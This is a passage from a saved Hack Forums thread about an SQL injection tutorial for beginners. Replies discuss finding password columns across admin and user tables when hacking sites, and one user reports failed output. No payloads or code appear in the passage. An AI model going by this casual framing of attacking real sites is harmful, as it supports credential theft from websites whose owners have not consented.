src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26820181"><blockquote><cite><span>(09-29-2012 05:11 AM)</span>Ѕyler Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26820009#pid26820009" class="quick_jump">►</a></cite>What if there is two tables with password column?"</blockquote><br>How many times do you find such situation?<br><br><blockquote><cite>Quote:</cite>No you didn't :&lt;</blockquote><br>What is your (real) problem?</div><div class="post_meta" id="post_meta_26820181"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26820181" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26820298" id="pid26820298"></a><table class="tborder" style="margin-top: 5px; " id="post_26820298" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 05:30 AM <span id="edited_by_26820298"><span class="smalltext">(This post was last modified: 09-29-2012 05:30 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994">Zixem</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26820298#pid26820298">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/5Mbiw.jpg" alt="" height="86" width="75"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><span class="group29">Zixem</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">75, jez gimme two months<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 110<br>Posts: 1,329<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1298994"><strong class="reputation_positive">341</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26820298"><blockquote><cite><span>(09-29-2012 05:23 AM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26820181#pid26820181" class="quick_jump">►</a></cite>How many times do you find such situation?</blockquote>How many times? alot.<br>When you hack site with admin table and users table? <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"></div><div class="post_meta" id="post_meta_26820298"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://zixem.altervista.org/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1298994" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26820298" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26821097" id="pid26821097"></a><table class="tborder" style="margin-top: 5px; " id="post_26821097" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-29-2012, 06:14 AM <span id="edited_by_26821097"><span class="smalltext">(This post was last modified: 09-29-2012 06:15 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=26821097#pid26821097">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,247<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">212</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26821097"><blockquote><cite><span>(09-29-2012 05:30 AM)</span>Ѕyler Wrote: <a href="http://www.hackforums.net/showthread.php?pid=26820298#pid26820298" class="quick_jump">►</a></cite>How many times? alot.<br>When you hack site with admin table and users table? <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"></blockquote><br>Thanks for info. I corrected my first post with your suggestion about more possible tables with column password.</div><div class="post_meta" id="post_meta_26821097"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=26821097" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29234322" id="pid29234322"></a><table class="tborder" style="margin-top: 5px; " id="post_29234322" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-29-2012, 03:56 AM <span id="edited_by_29234322"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=29234322#pid29234322">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1199484"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/1O7yp.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1199484"><span class="group2">fred93</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 300<br>Joined: Mar 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1199484"><strong class="reputation_positive">2</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29234322">Nice one :) HF is full of gr8 persons :) !!(:</div><div class="post_meta" id="post_meta_29234322"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1199484" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=29234322" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid29480669" id="pid29480669"></a><table class="tborder" style="margin-top: 5px; " id="post_29480669" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">01-06-2013, 11:32 AM <span id="edited_by_29480669"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=29480669#pid29480669">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1474661"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/killerbeat.png" alt="" height="84" width="84"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1474661"><span class="group2">LukeRZ</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 4<br>Posts: 126<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1474661"><strong class="reputation_negative">-2</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_29480669">Hmm, I just get a '2' on nearly all of them.<br><br><a href="http://gyazo.com/774c528bdde442fa0fd227246a64d590.png?1357497115" target="_blank">http://gyazo.com/774c528bdde442fa0fd2272...1357497115</a><br><br>The orange 2 is where the tables would usually be.</div><div class="post_meta" id="post_meta_29480669"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1474661" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=29480669" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34081063" id="pid34081063"></a><table class="tborder" style="margin-top: 5px; " id="post_34081063" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-20-2013, 08:55 PM <span id="edited_by_34081063"><span class="smalltext">(This post was last modified: 07-20-2013 08:56 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1693269">n3y4k0</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;pid=34081063#pid34081063">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1693269"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/jI6W3D6SGpYYI.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1693269"><span class="group2">n3y4k0</span></a></span></strong> <img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 18<br>Posts: 256<br>Joined: Feb 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1693269"><strong class="reputation_positive">12</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34081063">Nice post as usual! Nice person, and I recommend all users to follow his unique tutorials.</div><div class="post_meta" id="post_meta_34081063"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1693269" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495&amp;replyto=34081063" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2900495&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=2900495" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2900495">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=2900495" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2900495&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2900495.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="SQLi%20tip%20for%20newbies%20-%20searching%20in%20tables%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->